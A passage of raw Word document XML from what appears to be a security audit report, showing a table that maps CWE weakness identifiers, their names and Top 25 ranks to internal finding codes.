            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>All CWE identifiers cited (including those outside the Top 25)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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900"/>
        <w:gridCol w:w="3567"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="3273"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Top 25 rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, PB2-05, PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-18, PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, PB2-01, PB2-02, PB2-03, PB2-04, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09, PB1-03, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Control of Generation of Code (Code Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, CI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-05, APP-10, APP-13, CF-01, CF-02, CF-06, CF-07, CF-08, CF-14, CF-15, CF-16, CF-18, PB1-07, PB1-11, PB1-12, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Special Elements used in a Command (Command Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-02, DET-05, PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deserialization of Untrusted Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exposure of Sensitive Information to an Unauthorized Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11, CF-12, PB1-16, PB2-13, SEC-03, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-476</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>NULL Pointer Dereference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use of Hard-coded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14, PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Uncontrolled Resource Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04, CF-05, CF-07, CI-05, CI-15, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing Authentication for Critical Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1053</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-14, DET-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Insufficient Technical Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
